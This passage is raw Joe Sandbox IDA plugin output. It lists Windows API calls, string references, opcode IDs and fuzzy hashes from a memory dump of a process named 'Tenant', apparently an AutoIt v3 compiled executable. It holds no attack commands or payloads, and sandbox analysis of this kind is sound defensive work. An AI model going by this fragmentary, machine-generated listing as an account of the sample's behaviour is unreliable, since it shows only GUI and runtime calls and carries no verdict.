                                                                                          • Part of subcall function 00B2AF18: SetBkColor.GDI32(?,00000000), ref: 00B2AFBB
                                                                                          • Part of subcall function 00B2AF18: SelectObject.GDI32(?,?), ref: 00B2AFC8
                                                                                          • Part of subcall function 00B2AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AFE7
                                                                                          • Part of subcall function 00B2AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AFFE
                                                                                          • Part of subcall function 00B2AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B2B013
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                        • String ID:
                                                                                        • API String ID: 4124339563-0
                                                                                        • Opcode ID: 7a02c62fbdfbe3a82f72f43b0145d91da7518fc8941978f7b06927d3e4775b6b
                                                                                        • Instruction ID: 7928c484a50cadd010c1a31e62d7dbd994d717f772a0a87a24c6a57db96f6f63
                                                                                        • Opcode Fuzzy Hash: 7a02c62fbdfbe3a82f72f43b0145d91da7518fc8941978f7b06927d3e4775b6b
                                                                                        • Instruction Fuzzy Hash: F6A18C72018711AFD711AF64EC58A6F7BE9FF88321F200A19F966A71A0CB71D844CF52
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00AA3072
                                                                                        • DeleteObject.GDI32(00000000), ref: 00AA30B8
                                                                                        • DeleteObject.GDI32(00000000), ref: 00AA30C3
                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00AA30CE
                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00AA30D9
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00ADC77C
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ADC7B5
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ADCBDE
                                                                                          • Part of subcall function 00AA1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2412,?,00000000,?,?,?,?,00AA1AA7,00000000,?), ref: 00AA1F76
                                                                                        • SendMessageW.USER32(?,00001053), ref: 00ADCC1B
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ADCC32
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCC48
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCC53
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        • Opcode ID: 526b7472d25335dcfc476f05a14c66d852ffd0f325564a8ccd2aa65db2a8c1a6
                                                                                        • Instruction ID: c712092d734c1c13f83fdfd439e83b6ebcabbe2ab24408761b50aa15143af292
                                                                                        • Opcode Fuzzy Hash: 526b7472d25335dcfc476f05a14c66d852ffd0f325564a8ccd2aa65db2a8c1a6
                                                                                        • Instruction Fuzzy Hash: DA12CF31604602EFCB24DF24C894BA9BBF5BF05321F54456AF586CB2A2CB31ED42DB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 2660009612-1645009161
                                                                                        • Opcode ID: 54c940777cd9ad41c70871ac978ff4c1962686269433f68764afb1661b2e5589
                                                                                        • Instruction ID: d95fb89746f668038f6429c60f196443f55ee8e6edf2e5f4e1cbd46e29f0f8c1
                                                                                        • Opcode Fuzzy Hash: 54c940777cd9ad41c70871ac978ff4c1962686269433f68764afb1661b2e5589
                                                                                        • Instruction Fuzzy Hash: 42A17D31A00209ABCB24AF61DD52FBE77B8EF45B40F24416AF805AA293EB719E51D750
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 00B17BC8
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B17C87
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B17CC5
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B17CD7
                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B17D1D
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00B17D29
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B17D6D
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B17D7C
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B17D8C
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B17D90
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B17DA0
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B17DA9
                                                                                        • DeleteDC.GDI32(00000000), ref: 00B17DB2
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B17DDE
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B17DF5
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B17E30
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B17E44
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B17E55
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B17E85
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B17E90
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B17E9B
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B17EA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-517079104
                                                                                        • Opcode ID: 632c153e77b5345e4b60106329c11a6892a6af6025484f7bd71cf3822176c562
                                                                                        • Instruction ID: 36830a32af27f53c368fcb6854cefd7ac5c4a403d46c295ac54e73a854dc4c93
                                                                                        • Opcode Fuzzy Hash: 632c153e77b5345e4b60106329c11a6892a6af6025484f7bd71cf3822176c562
                                                                                        • Instruction Fuzzy Hash: FDA19171A50609BFEB14DB64DC5AFAE7BB9EF05714F104154FA14A72E0CBB4AD40CB60
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B0B361
                                                                                        • GetDriveTypeW.KERNEL32(?,00B32C4C,?,\\.\,00B30980), ref: 00B0B43E
                                                                                        • SetErrorMode.KERNEL32(00000000,00B32C4C,?,\\.\,00B30980), ref: 00B0B59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: 8a9840ae6ef1e713f908cc67a04eee84452a02e083afae9c1f67a66eaa670dfa
                                                                                        • Instruction ID: d5298197137cea62dda1c7066d8fdaf40f5a279e006b4e219ac0a7e934fe17a7
                                                                                        • Opcode Fuzzy Hash: 8a9840ae6ef1e713f908cc67a04eee84452a02e083afae9c1f67a66eaa670dfa
                                                                                        • Instruction Fuzzy Hash: BB519630B84209EBCB00EB60DDA2E7D7FE0EB59741B2480D5F806A72E1DB71AE45CB55
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B2A0F7
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B2A1B0
                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B2A1CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: 0
                                                                                        • API String ID: 2326795674-4108050209
                                                                                        • Opcode ID: 35d1b09047521acac802ef4c986573b974d1debe178f685657ff75ab2a3e5cb0
                                                                                        • Instruction ID: 2d4a25bb6f7aa8d507c7e0d0bef21a8e7816c522f52a4d384546ce7ae08e24cb
                                                                                        • Opcode Fuzzy Hash: 35d1b09047521acac802ef4c986573b974d1debe178f685657ff75ab2a3e5cb0
                                                                                        • Instruction Fuzzy Hash: D6020F30108320AFD715CF14E899BABBBE4FF89B14F04859DF999972A1CB75D844CB52
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00B2AF51
                                                                                        • SetTextColor.GDI32(?,?), ref: 00B2AF55
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B2AF6B
                                                                                        • GetSysColor.USER32(0000000F), ref: 00B2AF76
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00B2AF7B
                                                                                        • GetSysColor.USER32(00000011), ref: 00B2AF93
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2AFA1
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B2AFB2
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00B2AFBB
                                                                                        • SelectObject.GDI32(?,?), ref: 00B2AFC8
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AFE7
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AFFE
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00B2B013
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2B05F
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B2B086
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00B2B0A4
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00B2B0AF
                                                                                        • GetSysColor.USER32(00000011), ref: 00B2B0BD
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00B2B0C5
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B2B0D9
                                                                                        • SelectObject.GDI32(?,00B2AC1F), ref: 00B2B0F0
                                                                                        • DeleteObject.GDI32(?), ref: 00B2B0FB
                                                                                        • SelectObject.GDI32(?,?), ref: 00B2B101
                                                                                        • DeleteObject.GDI32(?), ref: 00B2B106
                                                                                        • SetTextColor.GDI32(?,?), ref: 00B2B10C
                                                                                        • SetBkColor.GDI32(?,?), ref: 00B2B116
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: febaeb279a2938d4cc3bd91ce3d3a586b0be7af72d3b910eb4da9705b3c93e3f
                                                                                        • Instruction ID: 058e4eacf9c543dc78f6dc0b229277d30af7c95f567e56619baef9710a4ae8d2
                                                                                        • Opcode Fuzzy Hash: febaeb279a2938d4cc3bd91ce3d3a586b0be7af72d3b910eb4da9705b3c93e3f
                                                                                        • Instruction Fuzzy Hash: 75616C71910218AFDF11AFA4DD88EAE7BB9FF08320F214155F919AB2A1DB759D40CF90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B290EA
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B290FB
                                                                                        • CharNextW.USER32(0000014E), ref: 00B2912A
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B2916B
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B29181
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B29192
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B291AF
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00B291FB
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B29211
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B29242
                                                                                        • _memset.LIBCMT ref: 00B29267
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B292B0
                                                                                        • _memset.LIBCMT ref: 00B2930F
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B29339
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B29391
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00B2943E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B29460
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B294AA
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B294D7
                                                                                        • DrawMenuBar.USER32(?), ref: 00B294E6
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00B2950E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: b682917ab88daa5d05e6c68e4af743373831f502a11089bc37b4419c6810d2fd
                                                                                        • Instruction ID: 8c599f7c2a0235073146376f54329bae71bb64ed6a5c1a70eec084b8e0e180bc
                                                                                        • Opcode Fuzzy Hash: b682917ab88daa5d05e6c68e4af743373831f502a11089bc37b4419c6810d2fd
                                                                                        • Instruction Fuzzy Hash: 26E18E71900228AFDF209F51DC84EEE7BB8EF05710F10819AF91DAB291DB749A81DF61
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00B25007
                                                                                        • GetDesktopWindow.USER32 ref: 00B2501C
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B25023
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B25085
                                                                                        • DestroyWindow.USER32(?), ref: 00B250B1
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B250DA
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B250F8
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B2511E
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00B25133
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B25146
                                                                                        • IsWindowVisible.USER32(?), ref: 00B25166
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B25181
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B25195
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B251AD
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00B251D3
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00B251ED
                                                                                        • CopyRect.USER32(?,?), ref: 00B25204
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00B2526F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: f9beaa2c865d53e4cae403a16c48b2929f868aea988cd15c4b705c473b5111c0
                                                                                        • Instruction ID: 9c396e8fb940855c09fe65190b1539948b4cc596aa1847878d49f2695d8f9480
                                                                                        • Opcode Fuzzy Hash: f9beaa2c865d53e4cae403a16c48b2929f868aea988cd15c4b705c473b5111c0
                                                                                        • Instruction Fuzzy Hash: C3B19770614710AFDB14DF64D989B6EBBE4FF88310F008A58F5999B2A1DB70E804CB96
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B0499C
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B049C2
                                                                                        • _wcscpy.LIBCMT ref: 00B049F0
                                                                                        • _wcscmp.LIBCMT ref: 00B049FB
                                                                                        • _wcscat.LIBCMT ref: 00B04A11
                                                                                        • _wcsstr.LIBCMT ref: 00B04A1C
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B04A38
                                                                                        • _wcscat.LIBCMT ref: 00B04A81
                                                                                        • _wcscat.LIBCMT ref: 00B04A88
                                                                                        • _wcsncpy.LIBCMT ref: 00B04AB3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: dade7a2df9a865cf2fff201913fc6c5aeaf776bbc66b431fe50f1fd3be90e479
                                                                                        • Instruction ID: bb8ab1025fed88c28024097a0ca2ae51a6ed0184143196a31ce3171c161e94cb
                                                                                        • Opcode Fuzzy Hash: dade7a2df9a865cf2fff201913fc6c5aeaf776bbc66b431fe50f1fd3be90e479
                                                                                        • Instruction Fuzzy Hash: D34104B2640204BADB11B7648E43FBF7BBCDF45710F11409EFA04A61D2EB319E1196B5
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA2C8C
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00AA2C94
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA2CBF
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00AA2CC7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00AA2CEC
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AA2D09
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AA2D19
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AA2D4C
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AA2D60
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00AA2D7E
                                                                                        • GetStockObject.GDI32(00000011), ref: 00AA2D9A
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA2DA5
                                                                                          • Part of subcall function 00AA2714: GetCursorPos.USER32(?), ref: 00AA2727
                                                                                          • Part of subcall function 00AA2714: ScreenToClient.USER32(00B677B0,?), ref: 00AA2744
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000001), ref: 00AA2769
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000002), ref: 00AA2777
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00AA13C7), ref: 00AA2DCC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        • Opcode ID: 83038b531a8761b136add20218d81fc1c612d2fafd87d47a21f355744d6d6b8a
                                                                                        • Instruction ID: f79768d1d7abc24a915cc03ca85c39ed5af9b9fe84fada7d5b8d71f6a9fdb797
                                                                                        • Opcode Fuzzy Hash: 83038b531a8761b136add20218d81fc1c612d2fafd87d47a21f355744d6d6b8a
                                                                                        • Instruction Fuzzy Hash: 81B14D7165020AAFDB14DFA8DD99BAD7BB5FF08314F104229FA16A72D0DB74A850CF50
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • GetForegroundWindow.USER32(00B30980,?,?,?,?,?), ref: 00AC04E3
